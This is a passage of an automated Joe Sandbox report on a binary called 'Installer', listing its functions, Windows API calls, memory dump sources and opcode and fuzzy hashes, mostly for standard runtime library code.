                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 28212332E00258ABCF269F99D845AAEF7F9AF44710F1A0419E906AF251CB74FD458B81
                                                                                                                                                                                                                                                    Function 0034B46C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00342673
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ___std_exception_copy
                                                                                                                                                                                                                                                    • String ID: bad array new length$ios_base::badbit set
                                                                                                                                                                                                                                                    • API String ID: 2659868963-1158432155
                                                                                                                                                                                                                                                    • Opcode ID: 66bb4888f5b7bc7a29bae4c50870ed2daf896f8466fe31295beb6ff27b1124d0
                                                                                                                                                                                                                                                    • Instruction ID: 7575760331b262d4d5252574687621eab1024c7ca8812d132648d09d717308a2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 66bb4888f5b7bc7a29bae4c50870ed2daf896f8466fe31295beb6ff27b1124d0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D10171F1614301ABDB159F28D855A5BBBE8DF08318F11881CF45D9F351D379E858CB81
                                                                                                                                                                                                                                                    Function 00342610 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0035060C: RaiseException.KERNEL32(E06D7363,00000001,00000003,0034F354,03383FB8,?,?,?,0034F354,00343D4A,0037759C,00343D4A), ref: 0035066D
                                                                                                                                                                                                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00342673
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1672708420.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672696127.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672726152.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672739230.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672750713.000000000037B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672763497.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672774226.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1672798149.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionRaise___std_exception_copy
                                                                                                                                                                                                                                                    • String ID: bad array new length$ios_base::badbit set
                                                                                                                                                                                                                                                    • API String ID: 3109751735-1158432155
                                                                                                                                                                                                                                                    • Opcode ID: 6a17d9b0a23b0cb2beae78c6f2b30fcd8ebba35efc8af4e481d163d882be38f1
                                                                                                                                                                                                                                                    • Instruction ID: 9cea460e9543a65c50e711778be0718b2a77089908f449da2b5c7e84535b5cae
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6a17d9b0a23b0cb2beae78c6f2b30fcd8ebba35efc8af4e481d163d882be38f1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 00F0F8F5A14300ABD715AF18D945B47BBE4EB49719F01C81CF9989B310D3B9D458CB92

                                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                                    Function 00361287 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 182COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0035C16A: GetLastError.KERNEL32(00000000,?,0035E58D), ref: 0035C16E
                                                                                                                                                                                                                                                      • Part of subcall function 0035C16A: SetLastError.KERNEL32(00000000,?,?,00000028,00358363), ref: 0035C210
                                                                                                                                                                                                                                                    • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 0036138F
                                                                                                                                                                                                                                                    • IsValidCodePage.KERNEL32(00000000), ref: 003613CD
                                                                                                                                                                                                                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 003613E0
                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00361428
                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00361443
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                                                                                                    • String ID: ,K7
                                                                                                                                                                                                                                                    • API String ID: 415426439-1697011031
                                                                                                                                                                                                                                                    • Opcode ID: cc8ed280dc08685d19b91772408b240f643a98487a1a2a6f58784d3f8b840459
                                                                                                                                                                                                                                                    • Instruction ID: c32a4522b7336582df8ba3b5243482cd12176ad5297fe9fc78d10fb8d6e83ebd
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cc8ed280dc08685d19b91772408b240f643a98487a1a2a6f58784d3f8b840459
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44517072A10605AFDB23DFA5CC45EBE77B8EF05700F198469F905EB194EB709A44CB60
                                                                                                                                                                                                                                                    Function 00361A07 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,2000000B,003613BD,00000002,00000000,?,?,?,003613BD,?,00000000), ref: 00361AA0
                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,20001004,003613BD,00000002,00000000,?,?,?,003613BD,?,00000000), ref: 00361AC9
                                                                                                                                                                                                                                                    • GetACP.KERNEL32(?,?,003613BD,?,00000000), ref: 00361ADE
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                                                                                                                    • String ID: ACP$OCP
                                                                                                                                                                                                                                                    • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                    • Opcode ID: ad050d7c7e22fa45425f15a238b0fc6c58c8b1216243c944c4516d9fb28e9408
                                                                                                                                                                                                                                                    • Instruction ID: 2ea98b674b87bdf1db4fa5ce46ef860c48b9a2afc83c2a117bc9dacec4f631cf
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ad050d7c7e22fa45425f15a238b0fc6c58c8b1216243c944c4516d9fb28e9408
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 84218622B02101ABD737CFE5C901A9772BAEB54B54B5FC564E90ADB20CE732DD40D350
                                                                                                                                                                                                                                                    Function 00341FB0 Relevance: 7.7, APIs: 5, Instructions: 200fileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00341240: _strlen.LIBCMT ref: 003412BA
                                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00342046
                                                                                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0034206B
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0034207A
                                                                                                                                                                                                                                                    • _strlen.LIBCMT ref: 003420CD
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 003421FD
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseFileHandle_strlen$ReadSize
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1490117831-0
                                                                                                                                                                                                                                                    • Opcode ID: bdd66fb108b55ba99c41e22f0f32ae93551cbf00bc5057087eee6b02b528882d
                                                                                                                                                                                                                                                    • Instruction ID: b9aa5d24326e26988dc5b3429dede176647a62f2cdeb772af169db629587cc50
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bdd66fb108b55ba99c41e22f0f32ae93551cbf00bc5057087eee6b02b528882d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5471D0B2C006089BCB12DFA4DC45BAEBBF5BF48314F150629F814BB391E775A945CBA1
                                                                                                                                                                                                                                                    Function 00359CC0 Relevance: 6.5, APIs: 4, Instructions: 455COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 3bc9877c2baeb9d2eefe3dc346bd414728ba2a6b644d6a7f2363c8b83004931b
                                                                                                                                                                                                                                                    • Instruction ID: ca032691a71f72c14cc1531e28e5ac15cbca6907ad26b225a267cf54a867a23a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3bc9877c2baeb9d2eefe3dc346bd414728ba2a6b644d6a7f2363c8b83004931b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A4024D71E006199BDF15CFA8C880BAEBBF1FF48315F25826AD915E7390D731AA05CB90
                                                                                                                                                                                                                                                    Function 00361FE9 Relevance: 6.2, APIs: 4, Instructions: 205COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 003620D9
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FileFindFirst
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1974802433-0
                                                                                                                                                                                                                                                    • Opcode ID: b0cd69994b50927011dc60df9c7aeb4e5c8ff437ebb0c57776a33832127ad0d4
                                                                                                                                                                                                                                                    • Instruction ID: b5c4f26aff0b0281b62aa8a75ce17c67d37369d39ac3d08a288238d26a83c6b9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b0cd69994b50927011dc60df9c7aeb4e5c8ff437ebb0c57776a33832127ad0d4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F7123B19055595FCF33AF34DC99AFBB7B8AB05300F1A81D9E448A7215DB304E848F50
                                                                                                                                                                                                                                                    Function 0034F8E9 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 0034F8F5
                                                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 0034F9C1
                                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0034F9DA
                                                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 0034F9E4
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 254469556-0
                                                                                                                                                                                                                                                    • Opcode ID: 0c645a0111b18e338bafa2cee1cecd391fa6e923b8ea3da3f12171da7f50bec8
                                                                                                                                                                                                                                                    • Instruction ID: 138bf7a91a1b20c4f867558ebdda8feab40f320dd9812732851e6fe31b3834a4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0c645a0111b18e338bafa2cee1cecd391fa6e923b8ea3da3f12171da7f50bec8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7A31D775D052199BDF22DFA5D949BCDBBF8AF08300F1041AAE40DAB250EB719A848F45
                                                                                                                                                                                                                                                    Function 00361F38 Relevance: 1.7, APIs: 1, Instructions: 199fileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0035D2B4: HeapAlloc.KERNEL32(00000008,00343D4A,00000018,?,0035C308,00000001,00000364,00000018,FFFFFFFF,000000FF,?,003576E9,0035BF54,00000000,?,0034A67D), ref: 0035D2F5
                                                                                                                                                                                                                                                    • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 003620D9
                                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 003621CD
                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0036220C
                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0036223F
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Find$CloseFile$AllocFirstHeapNext
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2701053895-0
                                                                                                                                                                                                                                                    • Opcode ID: be05d70df6dad39d131d79bbbcf536c13b2e18273427b9170b5af2408e0bbb55
                                                                                                                                                                                                                                                    • Instruction ID: 3e02cdc9103431127cf7262fcf6b3c7eccb4f0283e9adc2ad846bf70f5e8e01a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: be05d70df6dad39d131d79bbbcf536c13b2e18273427b9170b5af2408e0bbb55
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 15515571904508AFDF269F289C85ABFB7B9DF45344F1A829DF8089B209EB308D419B60
                                                                                                                                                                                                                                                    Function 0036AAE2 Relevance: 12.2, APIs: 8, Instructions: 248COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: __freea$__alloca_probe_16$Info
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 127012223-0
                                                                                                                                                                                                                                                    • Opcode ID: 8fa0adf9177e6b75d54d452e02e24c1cd3bf77f15769d132b19037a72e0fab77
                                                                                                                                                                                                                                                    • Instruction ID: 5076cf65ebc588612f83fa1d6c84799eb5fa9aa2ee3c53fb5feb4612db0b439f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8fa0adf9177e6b75d54d452e02e24c1cd3bf77f15769d132b19037a72e0fab77
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AF710572900A096FDF239E648C51FAF77BAEF45311F2A8055E904BB295E735DC408F62
                                                                                                                                                                                                                                                    Function 0034FE29 Relevance: 12.2, APIs: 8, Instructions: 177COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 0034FE70
                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 0034FE9C
                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 0034FEDB
                                                                                                                                                                                                                                                    • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0034FEF8
                                                                                                                                                                                                                                                    • LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0034FF37
                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 0034FF54
                                                                                                                                                                                                                                                    • LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 0034FF96
                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0034FFB9
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672261980.000000000037F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672277687.0000000000382000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672310909.00000000003CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_340000_Installer.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2040435927-0
                                                                                                                                                                                                                                                    • Opcode ID: 96885d3f46b6412fb5d64e7713fbdbe41b5590211f6d4e42bfed639f5204ea18
                                                                                                                                                                                                                                                    • Instruction ID: 50f55af91fd02c9c5451e34386ab74c70a058d26adf95e89798d6d107f7a4883
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 96885d3f46b6412fb5d64e7713fbdbe41b5590211f6d4e42bfed639f5204ea18
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 65519D7260061AAFEB225F60CC45FAB7BE9EF45750F1A443AFD15DE1A0D730AC548B50
                                                                                                                                                                                                                                                    Function 0035EE76 Relevance: 10.8, APIs: 7, Instructions: 329COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1672203636.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672186710.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672230663.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.1672246423.000000000037A000.00000008.00000001.01000000.00000003.sdmpDownload File
